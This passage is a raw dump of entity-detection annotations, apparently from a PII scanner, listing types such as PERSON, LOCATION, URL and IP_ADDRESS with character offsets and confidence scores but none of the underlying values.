50673, end: 50682, score: 0.85, type: PERSON, start: 50859, end: 50875, score: 0.85, type: LOCATION, start: 51402, end: 51411, score: 0.85, type: PERSON, start: 51611, end: 51627, score: 0.85, type: LOCATION, start: 51974, end: 51983, score: 0.85, type: PERSON, start: 52185, end: 52201, score: 0.85, type: PERSON, start: 52585, end: 52598, score: 0.85, type: LOCATION, start: 52644, end: 52652, score: 0.85, type: LOCATION, start: 52685, end: 52717, score: 0.85, type: PERSON, start: 53198, end: 53211, score: 0.85, type: PERSON, start: 53241, end: 53254, score: 0.85, type: PERSON, start: 53257, end: 53270, score: 0.85, type: PERSON, start: 53316, end: 53329, score: 0.85, type: LOCATION, start: 53370, end: 53378, score: 0.85, type: LOCATION, start: 53502, end: 53512, score: 0.85, type: LOCATION, start: 53815, end: 53825, score: 0.85, type: LOCATION, start: 54527, end: 54566, score: 0.85, type: LOCATION, start: 54567, end: 54575, score: 0.85, type: LOCATION, start: 54909, end: 54943, score: 0.85, type: PERSON, start: 55376, end: 55391, score: 0.85, type: DATE_TIME, start: 56693, end: 56707, score: 0.85, type: PERSON, start: 57134, end: 57140, score: 0.85, type: DATE_TIME, start: 57665, end: 57674, score: 0.85, type: LOCATION, start: 57732, end: 57751, score: 0.85, type: PERSON, start: 57933, end: 57946, score: 0.85, type: PERSON, start: 58126, end: 58149, score: 0.85, type: PERSON, start: 58592, end: 58605, score: 0.85, type: LOCATION, start: 59078, end: 59096, score: 0.85, type: PERSON, start: 59156, end: 59166, score: 0.85, type: PERSON, start: 59404, end: 59417, score: 0.85, type: PERSON, start: 59455, end: 59468, score: 0.85, type: PERSON, start: 59510, end: 59518, score: 0.85, type: PERSON, start: 59563, end: 59576, score: 0.85, type: PERSON, start: 60126, end: 60139, score: 0.85, type: URL, start: 60648, end: 60659, score: 0.85, type: LOCATION, start: 60960, end: 60969, score: 0.85, type: PERSON, start: 60972, end: 60985, score: 0.85, type: PERSON, start: 61460, end: 61473, score: 0.85, type: LOCATION, start: 62184, end: 62223, score: 0.85, type: LOCATION, start: 63105, end: 63113, score: 0.85, type: PERSON, start: 65854, end: 65867, score: 0.85, type: PERSON, start: 66265, end: 66277, score: 0.85, type: PERSON, start: 66339, end: 66352, score: 0.85, type: PERSON, start: 66416, end: 66429, score: 0.85, type: PERSON, start: 66686, end: 66704, score: 0.85, type: PERSON, start: 67038, end: 67050, score: 0.85, type: PERSON, start: 67200, end: 67213, score: 0.85, type: PERSON, start: 67370, end: 67388, score: 0.85, type: PERSON, start: 67658, end: 67670, score: 0.85, type: PERSON, start: 67779, end: 67791, score: 0.85, type: PERSON, start: 67878, end: 67891, score: 0.85, type: NRP, start: 68076, end: 68113, score: 0.85, type: PERSON, start: 68393, end: 68405, score: 0.85, type: PERSON, start: 68514, end: 68526, score: 0.85, type: URL, start: 68862, end: 68869, score: 0.85, type: URL, start: 68878, end: 68886, score: 0.85, type: URL, start: 68901, end: 68908, score: 0.85, type: PERSON, start: 70405, end: 70424, score: 0.85, type: LOCATION, start: 71098, end: 71137, score: 0.85, type: PERSON, start: 74077, end: 74090, score: 0.85, type: LOCATION, start: 74391, end: 74435, score: 0.85, type: LOCATION, start: 74436, end: 74444, score: 0.85, type: URL, start: 315, end: 357, score: 0.6, type: IP_ADDRESS, start: 5203, end: 5212, score: 0.6, type: IP_ADDRESS, start: 9907, end: 9916, score: 0.6, type: IP_ADDRESS, start: 10839, end: 10848, score: 0.6, type: IP_ADDRESS, start: 14591, end: 14600, score: 
0.6, type: IP_ADDRESS, start: 17510, end: 17519, score: 0.6, type: IP_ADDRESS, start: 21117, end: 21126, score: 0.6, type: IP_ADDRESS, start: 24468, end: 24477, score: 0.6, type: IP_ADDRESS, start: 24801, end: 24810, score: 0.6, type: IP_ADDRESS, start: 27924, end: 27933, score: 0.6, type: IP_ADDRESS, start: 32058, end: 32067, score: 0.6, type: IP_ADDRESS, start: 32990, end: 32999, score: 0.6, type: IP_ADDRESS, start: 38915, end: 38924, score: 0.6, type: IP_ADDRESS, start: 38984, end: 38993, score: 0.6, type: IP_ADDRESS, start: 39269, end: 39278, score: 0.6, type: IP_ADDRESS, start: 39640, end: 39649, score: 0.6, type: IP_ADDRESS, start: 46646, end: 46655, score: 0.6, type: IP_ADDRESS, start: 59797, end: 59806, score: 0.6, type: IP_ADDRESS, start: 59884, end: 59893, score: 0.6, type: IP_ADDRESS, start: 60825, end: 60834, score: 0.6, type: IP_ADDRESS, start: 61863, end: 61872, score: 0.6, type: IP_ADDRESS, start: 61976, end: 61985, score: 0.6, type: IP_ADDRESS, start: 68835, end: 68844, score: 0.6, type: IP_ADDRESS, start: 74514, end: 74523, score: 0.6, type: IP_ADDRESS, start: 75019, end: 75028, score: 0.6, type: URL, start: 950, end: 960, score: 0.5, type: URL, start: 989, end: 999, score: 0.5, type: URL, start: 1032, end: 1042, score: 0.5, type: URL, start: 1068, end: 1078, score: 0.5, type: URL, start: 1101, end: 1111, score: 0.5, type: URL, start: 1134, end: 1144, score: 0.5, type: URL, start: 1182, end: 1191, score: 0.5, type: URL, start: 1224, end: 1233, score: 0.5, type: URL, start: 1276, end: 1293, score: 0.5, type: URL, start: 1324, end: 1341, score: 0.5, type: URL, start: 1381, end: 1398, score: 0.5, type: URL, start: 1472, end: 1487, score: 0.5, type: URL, start: 4405, end: 4412, score: 0.5, type: URL, start: 4570, end: 4577, score: 0.5, type: URL, start: 4736, end: 4746, score: 0.5, type: URL, start: 4826, end: 4833, score: 0.5, type: URL, start: 4842, end: 4852, score: 0.5, type: URL, start: 4879, end: 4886, score: 0.5, type: URL, start: 4977, end: 4984, score: 0.5, type: URL, start: 6020, end: 6027, score: 0.5, type: URL, start: 6029, end: 6035, score: 0.5, type: URL, start: 6067, end: 6074, score: 0.5, type: URL, start: 6082, end: 6087, score: 0.5, type: URL, start: 6117, end: 6124, score: 0.5, type: URL, start: 6131, end: 6140, score: 0.5, type: URL, start: 6184, end: 6191, score: 0.5, type: URL, start: 6229, end: 6236, score: 0.5, type: URL, start: 6239, end: 6252, score: 0.5, type: URL, start: 7130, end: 7142, score: 0.5, type: URL, start: 7192, end: 7204, score: 0.5, type: URL, start: 7262, end: 7269, score: 0.5, type: URL, start: 7324, end: 7331, score: 0.5, type: URL, start: 7393, end: 7405, score: 0.5, type: URL, start: 7451, end: 7463, score: 0.5, type: URL, start: 7526, end: 7538, score: 0.5, type: URL, start: 7707, end: 7719, score: 0.5, type: URL, start: 7771, end: 7783, score: 0.5, type: URL, start: 7835, end: 7842, score: 0.5, type: URL, start: 7910, end: 7922, score: 0.5, type: URL, start: 8034, end: 8041, score: 0.5, type: URL, start: 8093, end: 8100, score: 0.5, type: URL, start: 8163, end: 8175, score: 0.5, type: URL, start: 8238, end: 8246, score: 0.5, type: URL, start: 8416, end: 8423, score: 0.5, type: URL, start: 8456, end: 8463, score: 0.5, type: URL, start: 8595, end: 8602, score: 0.5, type: URL, start: 9667, end: 9674, score: 0.5, type: URL, start: 10188, end: 10195, score: 0.5, type: URL, start: 10206, end: 10218, score: 0.5, type: URL, start: 10265, end: 10273, score: 0.5, type: URL, start: 10458, end: 10465, score: 0.5, type: URL, start: 10621, 
end: 10628, score: 0.5, type: URL, start: 11728, end: 11735, score: 0.5, type: URL, start: 11737, end: 11743, score: 0.5, type: URL, start: 11775, end: 11782, score: 0.5, type: URL, start: 11790, end: 11795, score: 0.5, type: URL, start: 11825, end: 11832, score: 0.5, type: URL, start: 11839, end: 11848, score: 0.5, type: URL, start: 12086, end: 12093, score: 0.5, type: URL, start: 12143, end: 12150, score: 0.5, type: URL, start: 12153, end: 12166, score: 0.5, type: URL, start: 12375, end: 12387, score: 0.5, type: URL, start: 12437, end: 12449, score: 0.5, type: URL, start: 12507, end: 12514, score: 0.5, type: URL, start: 12569, end: 12576, score: 0.5, type: URL, start: 12638, end: 12650, score: 0.5, type: URL, start: 12696, end: 12708, score: 0.5, type: URL, start: 12771, end: 12783, score: 0.5, type: URL, start: 13189, end: 13201, score: 0.5, type: URL, start: 13253, end: 13265, score: 0.5, type: URL, start: 13317, end: 13329, score: 0.5, type: URL, start: 13387, end: 13399, score: 0.5, type: URL, start: 13520, end: 13527, score: 0.5, type: URL, start: 13595, end: 13607, score: 0.5, type: URL, start: 13719, end: 13726, score: 0.5, type: URL, start: 13789, end: 13801, score: 0.5, type: URL, start: 13863, end: 13871, score: 0.5, type: URL, start: 14075, end: 14082, score: 0.5, type: URL, start: 14115, end: 14122, score: 0.5, type: URL, start: 14151, end: 14158, score: 0.5, type: URL, start: 14210, end: 14217, score: 0.5, type: URL, start: 14388, end: 14395, score: 0.5, type: URL, start: 15361, end: 15368, score: 0.5, type: URL, start: 15370, end: 15376, score: 0.5, type: URL, start: 15408, end: 15415, score: 0.5, type: URL, start: 15423, end: 15428, score: 0.5, type: URL, start: 15458, end: 15465, score: 0.5, type: URL, start: 15472, end: 15481, score: 0.5, type: URL, start: 15525, end: 15532, score: 0.5, type: URL, start: 15570, end: 15577, score: 0.5, type: URL, start: 15580, end: 15593, score: 0.5, type: URL, start: 15652, end: 15664, score: 0.5, type: URL, start: 15714, end: 15726, score: 0.5, type: URL, start: 15784, end: 15791, score: 0.5, type: URL, start: 15846, end: 15853, score: 0.5, type: URL, start: 15915, end: 15927, score: 0.5, type: URL, start: 15973, end: 15985, score: 0.5, type: URL, start: 16048, end: 16060, score: 0.5, type: URL, start: 16468, end: 16480, score: 0.5, type: URL, start: 16532, end: 16539, score: 0.5, type: URL, start: 16607, end: 16614, score: 0.5, type: URL, start: 16666, end: 16673, score: 0.5, type: URL, start: 16736, end: 16748, score: 0.5, type: URL, start: 16810, end: 16818, score: 0.5, type: URL, start: 17236, end: 17243, score: 0.5, type: URL, start: 17276, end: 17283, score: 0.5, type: URL, start: 17301, end: 17308, score: 0.5, type: URL, start: 18377, end: 18384, score: 0.5, type: URL, start: 18386, end: 18392, score: 0.5, type: URL, start: 18424, end: 18431, score: 0.5, type: URL, start: 18439, end: 18444, score: 0.5, type: URL, start: 18474, end: 18481, score: 0.5, type: URL, start: 18488, end: 18497, score: 0.5, type: URL, start: 18541, end: 18548, score: 0.5, type: URL, start: 18586, end: 18593, score: 0.5, type: URL, start: 18596, end: 18609, score: 0.5, type: URL, start: 18818, end: 18830, score: 0.5, type: URL, start: 18880, end: 18892, score: 0.5, type: URL, start: 18950, end: 18957, score: 0.5, type: URL, start: 19012, end: 19019, score: 0.5, type: URL, start: 19081, end: 19093, score: 0.5, type: URL, start: 19139, end: 19151, score: 0.5, type: URL, start: 19214, end: 19226, score: 0.5, type: URL, start: 19634, end: 19646, score: 0.5, 
type: URL, start: 19698, end: 19710, score: 0.5, type: URL, start: 19762, end: 19774, score: 0.5, type: URL, start: 19831, end: 19838, score: 0.5, type: URL, start: 19906, end: 19918, score: 0.5, type: URL, start: 20030, end: 20042, score: 0.5, type: URL, start: 20215, end: 20222, score: 0.5, type: URL, start: 20274, end: 20281, score: 0.5, type: URL, start: 20344, end: 20356, score: 0.5, type: URL, start: 20418, end: 20426, score: 0.5, type: URL, start: 20844, end: 20851, score: 0.5, type: URL, start: 20884, end: 20891, score: 0.5, type: URL, start: 20909, end: 20916, score: 0.5, type: URL, start: 21981, end: 21988, score: 0.5, type: URL, start: 21990, end: 21996, score: 0.5, type: URL, start: 22028, end: 22035, score: 0.5, type: URL, start: 22043, end: 22048, score: 0.5, type: URL, start: 22078, end: 22085, score: 0.5, type: URL, start: 22092, end: 22101, score: 0.5, type: URL, start: 22145, end: 22152, score: 0.5, type: URL, start: 22190, end: 22197, score: 0.5, type: URL, start: 22200, end: 22213, score: 0.5, type: URL, start: 22422, end: 22429, score: 0.5, type: URL, start: 22478, end: 22490, score: 0.5, type: URL, start: 22540, end: 22552, score: 0.5, type: URL, start: 22610, end: 22617, score: 0.5, type: URL, start: 22672, end: 22679, score: 0.5, type: URL, start: 22741, end: 22753, score: 0.5, type: URL, start: 22799, end: 22811, score: 0.5, type: URL, start: 23220, end: 23232, score: 0.5, type: URL, start: 23284, end: 23296, score: 0.5, type: URL, start: 23348, end: 23360, score: 0.5, type: URL, start: 23417, end: 23424, score: 0.5, type: URL, start: 23492, end: 23504, score: 0.5, type: URL, start: 23616, end: 23623, score: 0.5, type: URL, start: 23675, end: 23682, score: 0.5, type: URL, start: 23745, end: 23757, score: 0.5, type: URL, start: 23819, end: 23827, score: 0.5, type: URL, start: 24039, end: 24046, score: 0.5, type: URL, start: 24079, end: 24086, score: 0.5, type: URL, start: 24104, end: 24111, score: 0.5, type: URL, start: 24128, end: 24135, score: 0.5, type: URL, start: 24147, end: 24154, score: 0.5, type: URL, start: 24168, end: 24175, score: 0.5, type: URL, start: 24235, end: 24242, score: 0.5, type: URL, start: 25379, end: 25386, score: 0.5, type: URL, start: 25388, end: 25394, score: 0.5, type: URL, start: 25426, end: 25433, score: 0.5, type: URL, start: 25441, end: 25446, score: 0.5, type: URL, start: 25476, end: 25483, score: 0.5, type: URL, start: 25490, end: 25499, score: 0.5, type: URL, start: 25543, end: 25550, score: 0.5, type: URL, start: 25588, end: 25595, score: 0.5, type: URL, start: 25598, end: 25611, score: 0.5, type: URL, start: 25810, end: 25824, score: 0.5, type: URL, start: 25888, end: 25900, score: 0.5, type: URL, start: 25950, end: 25962, score: 0.5, type: URL, start: 26020, end: 26027, score: 0.5, type: URL, start: 26082, end: 26089, score: 0.5, type: URL, start: 26151, end: 26163, score: 0.5, type: URL, start: 26209, end: 26221, score: 0.5, type: URL, start: 26839, end: 26851, score: 0.5, type: URL, start: 26903, end: 26915, score: 0.5, type: URL, start: 26974, end: 26981, score: 0.5, type: URL, start: 26987, end: 26994, score: 0.5, type: URL, start: 27042, end: 27049, score: 0.5, type: URL, start: 27117, end: 27124, score: 0.5, type: URL, start: 27176, end: 27183, score: 0.5, type: URL, start: 27246, end: 27258, score: 0.5, type: URL, start: 27320, end: 27328, score: 0.5, type: URL, start: 28369, end: 28376, score: 0.5, type: URL, start: 28378, end: 28384, score: 0.5, type: URL, start: 28416, end: 28423, score: 0.5, type: URL, start: 28430, 
end: 28439, score: 0.5, type: URL, start: 28470, end: 28476, score: 0.5, type: URL, start: 28528, end: 28540, score: 0.5, type: URL, start: 28598, end: 28605, score: 0.5, type: URL, start: 28660, end: 28667, score: 0.5, type: URL, start: 28729, end: 28741, score: 0.5, type: URL, start: 28787, end: 28794, score: 0.5, type: URL, start: 28856, end: 28863, score: 0.5, type: URL, start: 28926, end: 28938, score: 0.5, type: URL, start: 29000, end: 29008, score: 0.5, type: URL, start: 29134, end: 29141, score: 0.5, type: URL, start: 29174, end: 29181, score: 0.5, type: URL, start: 29199, end: 29206, score: 0.5, type: URL, start: 29275, end: 29282, score: 0.5, type: URL, start: 29432, end: 29439, score: 0.5, type: URL, start: 29476, end: 29483, score: 0.5, type: URL, start: 29494, end: 29506, score: 0.5, type: URL, start: 29543, end: 29551, score: 0.5, type: URL, start: 29587, end: 29594, score: 0.5, type: URL, start: 29612, end: 29619, score: 0.5, type: URL, start: 29635, end: 29642, score: 0.5, type: URL, start: 29653, end: 29658, score: 0.5, type: URL, start: 29840, end: 29845, score: 0.5, type: URL, start: 29872, end: 29879, score: 0.5, type: URL, start: 29890, end: 29902, score: 0.5, type: URL, start: 29939, end: 29947, score: 0.5, type: URL, start: 30004, end: 30011, score: 0.5, type: URL, start: 30029, end: 30034, score: 0.5, type: URL, start: 30050, end: 30057, score: 0.5, type: URL, start: 30068, end: 30073, score: 0.5, type: URL, start: 30465, end: 30470, score: 0.5, type: URL, start: 30496, end: 30504, score: 0.5, type: URL, start: 30565, end: 30570, score: 0.5, type: URL, start: 30609, end: 30616, score: 0.5, type: URL, start: 30759, end: 30766, score: 0.5, type: URL, start: 30803, end: 30811, score: 0.5, type: URL, start: 30851, end: 30858, score: 0.5, type: URL, start: 31029, end: 31036, score: 0.5, type: URL, start: 31173, end: 31181, score: 0.5, type: URL, start: 31220, end: 31227, score: 0.5, type: URL, start: 31427, end: 31434, score: 0.5, type: URL, start: 31490, end: 31497, score: 0.5, type: URL, start: 31562, end: 31569, score: 0.5, type: URL, start: 31633, end: 31640, score: 0.5, type: URL, start: 32126, end: 32133, score: 0.5, type: URL, start: 32221, end: 32228, score: 0.5, type: URL, start: 32513, end: 32522, score: 0.5, type: URL, start: 32563, end: 32572, score: 0.5, type: URL, start: 32619, end: 32625, score: 0.5, type: URL, start: 32673, end: 32680, score: 0.5, type: URL, start: 33522, end: 33529, score: 0.5, type: URL, start: 33688, end: 33698, score: 0.5, type: URL, start: 33778, end: 33785, score: 0.5, type: URL, start: 33794, end: 33804, score: 0.5, type: URL, start: 33831, end: 33838, score: 0.5, type: URL, start: 33929, end: 33936, score: 0.5, type: URL, start: 33976, end: 33983, score: 0.5, type: URL, start: 33985, end: 33991, score: 0.5, type: URL, start: 34023, end: 34030, score: 0.5, type: URL, start: 34038, end: 34043, score: 0.5, type: URL, start: 34086, end: 34093, score: 0.5, type: URL, start: 34145, end: 34157, score: 0.5, type: URL, start: 34207, end: 34219, score: 0.5, type: URL, start: 34277, end: 34284, score: 0.5, type: URL, start: 34339, end: 34346, score: 0.5, type: URL, start: 34408, end: 34415, score: 0.5, type: URL, start: 34915, end: 34922, score: 0.5, type: URL, start: 34985, end: 34997, score: 0.5, type: URL, start: 35038, end: 35045, score: 0.5, type: URL, start: 35071, end: 35079, score: 0.5, type: URL, start: 35286, end: 35293, score: 0.5, type: URL, start: 35326, end: 35333, score: 0.5, type: URL, start: 35478, end: 35489, score: 0.5, 
type: URL, start: 35692, end: 35697, score: 0.5, type: URL, start: 36143, end: 36147, score: 0.5, type: URL, start: 36160, end: 36167, score: 0.5, type: URL, start: 36556, end: 36560, score: 0.5, type: URL, start: 36573, end: 36580, score: 0.5, type: URL, start: 36716, end: 36727, score: 0.5, type: URL, start: 37069, end: 37073, score: 0.5, type: URL, start: 37086, end: 37093, score: 0.5, type: URL, start: 37230, end: 37241, score: 0.5, type: URL, start: 37552, end: 37556, score: 0.5, type: URL, start: 37569, end: 37576, score: 0.5, type: URL, start: 38021, end: 38025, score: 0.5, type: URL, start: 38038, end: 38045, score: 0.5, type: URL, start: 38459, end: 38463, score: 0.5, type: URL, start: 38476, end: 38483, score: 0.5, type: URL, start: 38536, end: 38543, score: 0.5, type: URL, start: 38548, end: 38555, score: 0.5, type: URL, start: 38713, end: 38721, score: 0.5, type: URL, start: 38773, end: 38780, score: 0.5, type: URL, start: 38789, end: 38797, score: 0.5, type: URL, start: 38812, end: 38819, score: 0.5, type: URL, start: 38969, end: 38977, score: 0.5, type: URL, start: 39025, end: 39032, score: 0.5, type: URL, start: 39066, end: 39073, score: 0.5, type: URL, start: 39116, end: 39123, score: 0.5, type: URL, start: 39322, end: 39328, score: 0.5, type: URL, start: 39388, end: 39395, score: 0.5, type: URL, start: 39404, end: 39412, score: 0.5, type: URL, start: 39451, end: 39457, score: 0.5, type: URL, start: 39504, end: 39511, score: 0.5, type: URL, start: 39690, end: 39695, score: 0.5, type: URL, start: 39723, end: 39730, score: 0.5, type: URL, start: 39741, end: 39753, score: 0.5, type: URL, start: 39800, end: 39808, score: 0.5, type: URL, start: 39844, end: 39849, score: 0.5, type: URL, start: 39865, end: 39872, score: 0.5, type: URL, start: 39895, end: 39902, score: 0.5, type: URL, start: 39913, end: 39918, score: 0.5, type: URL, start: 39953, end: 39960, score: 0.5, type: URL, start: 40110, end: 40120, score: 0.5, type: URL, start: 40148, end: 40156, score: 0.5, type: URL, start: 40179, end: 40186, score: 0.5, type: URL, start: 40199, end: 40207, score: 0.5, type: URL, start: 40239, end: 40246, score: 0.5, type: URL, start: 40259, end: 40267, score: 0.5, type: URL, start: 40303, end: 40313, score: 0.5, type: URL, start: 40341, end: 40349, score: 0.5, type: URL, start: 40372, end: 40379, score: 0.5, type: URL, start: 40392, end: 40400, score: 0.5, type: URL, start: 40432, end: 40439, score: 0.5, type: URL, start: 40452, end: 40460, score: 0.5, type: URL, start: 40496, end: 40506, score: 0.5, type: URL, start: 40535, end: 40543, score: 0.5, type: URL, start: 40567, end: 40574, score: 0.5, type: URL, start: 40587, end: 40595, score: 0.5, type: URL, start: 40627, end: 40634, score: 0.5, type: URL, start: 40647, end: 40655, score: 0.5, type: URL, start: 40691, end: 40701, score: 0.5, type: URL, start: 40734, end: 40742, score: 0.5, type: URL, start: 40770, end: 40777, score: 0.5, type: URL, start: 40790, end: 40798, score: 0.5, type: URL, start: 40830, end: 40837, score: 0.5, type: URL, start: 40850, end: 40858, score: 0.5, type: URL, start: 40934, end: 40947, score: 0.5, type: URL, start: 41037, end: 41045, score: 0.5, type: URL, start: 41067, end: 41074, score: 0.5, type: URL, start: 41086, end: 41093, score: 0.5, type: URL, start: 41187, end: 41200, score: 0.5, type: URL, start: 41306, end: 41314, score: 0.5, type: URL, start: 41336, end: 41343, score: 0.5, type: URL, start: 41355, end: 41362, score: 0.5, type: URL, start: 41452, end: 41465, score: 0.5, type: URL, start: 41495, 
end: 41503, score: 0.5, type: URL, start: 41525, end: 41532, score: 0.5, type: URL, start: 41544, end: 41551, score: 0.5, type: URL, start: 41637, end: 41650, score: 0.5, type: URL, start: 41706, end: 41713, score: 0.5, type: URL, start: 41724, end: 41736, score: 0.5, type: URL, start: 41783, end: 41791, score: 0.5, type: URL, start: 41814, end: 41821, score: 0.5, type: URL, start: 41891, end: 41904, score: 0.5, type: URL, start: 41957, end: 41964, score: 0.5, type: URL, start: 41975, end: 41987, score: 0.5, type: URL, start: 42034, end: 42042, score: 0.5, type: URL, start: 42065, end: 42072, score: 0.5, type: URL, start: 42079, end: 42086, score: 0.5, type: URL, start: 42282, end: 42289, score: 0.5, type: URL, start: 42325, end: 42332, score: 0.5, type: URL, start: 42445, end: 42452, score: 0.5, type: URL, start: 42477, end: 42484, score: 0.5, type: URL, start: 42551, end: 42558, score: 0.5, type: URL, start: 42595, end: 42602, score: 0.5, type: URL, start: 42615, end: 42622, score: 0.5, type: URL, start: 42695, end: 42702, score: 0.5, type: URL, start: 42711, end: 42718, score: 0.5, type: URL, start: 42725, end: 42731, score: 0.5, type: URL, start: 42745, end: 42752, score: 0.5, type: URL, start: 42761, end: 42768, score: 0.5, type: URL, start: 42775, end: 42781, score: 0.5, type: URL, start: 42793, end: 42800, score: 0.5, type: URL, start: 42812, end: 42819, score: 0.5, type: URL, start: 42892, end: 42899, score: 0.5, type: URL, start: 42907, end: 42914, score: 0.5, type: URL, start: 42920, end: 42926, score: 0.5, type: URL, start: 42940, end: 42947, score: 0.5, type: URL, start: 42956, end: 42963, score: 0.5, type: URL, start: 42969, end: 42975, score: 0.5, type: URL, start: 42987, end: 42994, score: 0.5, type: URL, start: 43010, end: 43017, score: 0.5, type: URL, start: 43096, end: 43103, score: 0.5, type: URL, start: 43115, end: 43122, score: 0.5, type: URL, start: 43132, end: 43138, score: 0.5, type: URL, start: 43152, end: 43159, score: 0.5, type: URL, start: 43168, end: 43175, score: 0.5, type: URL, start: 43185, end: 43191, score: 0.5, type: URL, start: 43203, end: 43210, score: 0.5, type: URL, start: 43213, end: 43218, score: 0.5, type: URL, start: 43301, end: 43308, score: 0.5, type: URL, start: 43364, end: 43371, score: 0.5, type: URL, start: 43374, end: 43380, score: 0.5, type: URL, start: 43407, end: 43414, score: 0.5, type: URL, start: 43425, end: 43437, score: 0.5, type: URL, start: 43504, end: 43511, score: 0.5, type: URL, start: 43514, end: 43521, score: 0.5, type: URL, start: 43636, end: 43643, score: 0.5, type: URL, start: 43674, end: 43681, score: 0.5, type: URL, start: 43684, end: 43690, score: 0.5, type: URL, start: 43712, end: 43719, score: 0.5, type: URL, start: 43736, end: 43743, score: 0.5, type: URL, start: 43746, end: 43751, score: 0.5, type: URL, start: 43773, end: 43780, score: 0.5, type: URL, start: 43783, end: 43790, score: 0.5, type: URL, start: 43920, end: 43927, score: 0.5, type: URL, start: 44132, end: 44139, score: 0.5, type: URL, start: 44142, end: 44148, score: 0.5, type: URL, start: 44197, end: 44204, score: 0.5, type: URL, start: 44207, end: 44214, score: 0.5, type: URL, start: 44241, end: 44248, score: 0.5, type: URL, start: 44276, end: 44283, score: 0.5, type: URL, start: 44294, end: 44306, score: 0.5, type: URL, start: 44373, end: 44380, score: 0.5, type: URL, start: 44383, end: 44390, score: 0.5, type: URL, start: 44505, end: 44512, score: 0.5, type: URL, start: 44543, end: 44550, score: 0.5, type: URL, start: 44560, end: 44567, score: 0.5, 
type: URL, start: 44570, end: 44576, score: 0.5, type: URL, start: 44605, end: 44612, score: 0.5, type: URL, start: 44615, end: 44620, score: 0.5, type: URL, start: 44642, end: 44649, score: 0.5, type: URL, start: 44652, end: 44659, score: 0.5, type: URL, start: 44789, end: 44796, score: 0.5, type: URL, start: 45190, end: 45197, score: 0.5, type: URL, start: 45200, end: 45205, score: 0.5, type: URL, start: 45368, end: 45375, score: 0.5, type: URL, start: 45378, end: 45384, score: 0.5, type: URL, start: 45439, end: 45446, score: 0.5, type: URL, start: 45478, end: 45485, score: 0.5, type: URL, start: 45517, end: 45524, score: 0.5, type: URL, start: 45552, end: 45559, score: 0.5, type: URL, start: 45570, end: 45582, score: 0.5, type: URL, start: 45649, end: 45656, score: 0.5, type: URL, start: 45659, end: 45666, score: 0.5, type: URL, start: 45771, end: 45778, score: 0.5, type: URL, start: 45809, end: 45816, score: 0.5, type: URL, start: 45826, end: 45833, score: 0.5, type: URL, start: 45836, end: 45842, score: 0.5, type: URL, start: 45871, end: 45878, score: 0.5, type: URL, start: 45881, end: 45886, score: 0.5, type: URL, start: 45908, end: 45915, score: 0.5, type: URL, start: 45918, end: 45925, score: 0.5, type: URL, start: 46050, end: 46057, score: 0.5, type: URL, start: 46221, end: 46228, score: 0.5, type: URL, start: 46697, end: 46704, score: 0.5, type: URL, start: 46707, end: 46712, score: 0.5, type: URL, start: 46879, end: 46886, score: 0.5, type: URL, start: 46889, end: 46895, score: 0.5, type: URL, start: 46950, end: 46957, score: 0.5, type: URL, start: 46989, end: 46996, score: 0.5, type: URL, start: 47028, end: 47035, score: 0.5, type: URL, start: 47065, end: 47072, score: 0.5, type: URL, start: 47083, end: 47095, score: 0.5, type: URL, start: 47162, end: 47169, score: 0.5, type: URL, start: 47172, end: 47179, score: 0.5, type: URL, start: 47294, end: 47301, score: 0.5, type: URL, start: 47550, end: 47557, score: 0.5, type: URL, start: 47560, end: 47565, score: 0.5, type: URL, start: 47587, end: 47594, score: 0.5, type: URL, start: 47597, end: 47604, score: 0.5, type: URL, start: 48145, end: 48152, score: 0.5, type: URL, start: 48175, end: 48182, score: 0.5, type: URL, start: 48260, end: 48267, score: 0.5, type: URL, start: 48292, end: 48299, score: 0.5, type: URL, start: 48351, end: 48358, score: 0.5, type: URL, start: 48510, end: 48516, score: 0.5, type: URL, start: 48550, end: 48558, score: 0.5, type: URL, start: 48572, end: 48579, score: 0.5, type: URL, start: 48582, end: 48589, score: 0.5, type: URL, start: 48659, end: 48666, score: 0.5, type: URL, start: 48996, end: 49003, score: 0.5, type: URL, start: 49059, end: 49066, score: 0.5, type: URL, start: 49216, end: 49223, score: 0.5, type: URL, start: 49324, end: 49330, score: 0.5, type: URL, start: 49931, end: 49938, score: 0.5, type: URL, start: 49985, end: 49991, score: 0.5, type: URL, start: 50025, end: 50033, score: 0.5, type: URL, start: 50047, end: 50054, score: 0.5, type: URL, start: 50057, end: 50064, score: 0.5, type: URL, start: 50134, end: 50141, score: 0.5, type: URL, start: 50178, end: 50185, score: 0.5, type: URL, start: 50246, end: 50252, score: 0.5, type: URL, start: 50285, end: 50292, score: 0.5, type: URL, start: 50348, end: 50355, score: 0.5, type: URL, start: 50541, end: 50548, score: 0.5, type: URL, start: 50571, end: 50578, score: 0.5, type: URL, start: 50707, end: 50712, score: 0.5, type: URL, start: 50754, end: 50761, score: 0.5, type: URL, start: 50961, end: 50968, score: 0.5, type: URL, start: 51197, 
end: 51205, score: 0.5, type: URL, start: 51225, end: 51232, score: 0.5, type: URL, start: 51235, end: 51242, score: 0.5, type: URL, start: 51264, end: 51271, score: 0.5, type: URL, start: 51310, end: 51317, score: 0.5, type: URL, start: 51331, end: 51336, score: 0.5, type: URL, start: 51436, end: 51441, score: 0.5, type: URL, start: 51453, end: 51469, score: 0.5, type: URL, start: 51514, end: 51521, score: 0.5, type: URL, start: 51687, end: 51694, score: 0.5, type: URL, start: 51705, end: 51721, score: 0.5, type: URL, start: 51767, end: 51775, score: 0.5, type: URL, start: 51822, end: 51829, score: 0.5, type: URL, start: 51858, end: 51865, score: 0.5, type: URL, start: 51887, end: 51894, score: 0.5, type: URL, start: 52008, end: 52015, score: 0.5, type: URL, start: 52027, end: 52043, score: 0.5, type: URL, start: 52088, end: 52095, score: 0.5, type: URL, start: 52261, end: 52268, score: 0.5, type: URL, start: 52279, end: 52295, score: 0.5, type: URL, start: 52341, end: 52349, score: 0.5, type: URL, start: 52396, end: 52403, score: 0.5, type: URL, start: 52432, end: 52439, score: 0.5, type: URL, start: 52461, end: 52468, score: 0.5, type: URL, start: 52506, end: 52513, score: 0.5, type: URL, start: 52528, end: 52533, score: 0.5, type: URL, start: 52542, end: 52549, score: 0.5, type: URL, start: 52741, end: 52748, score: 0.5, type: URL, start: 52771, end: 52778, score: 0.5, type: URL, start: 52895, end: 52902, score: 0.5, type: URL, start: 52951, end: 52958, score: 0.5, type: URL, start: 52984, end: 52991, score: 0.5, type: URL, start: 53079, end: 53087, score: 0.5, type: URL, start: 53104, end: 53111, score: 0.5, type: URL, start: 53127, end: 53134, score: 0.5, type: URL, start: 53167, end: 53174, score: 0.5, type: URL, start: 53214, end: 53221, score: 0.5, type: URL, start: 53273, end: 53280, score: 0.5, type: URL, start: 53542, end: 53550, score: 0.5, type: URL, 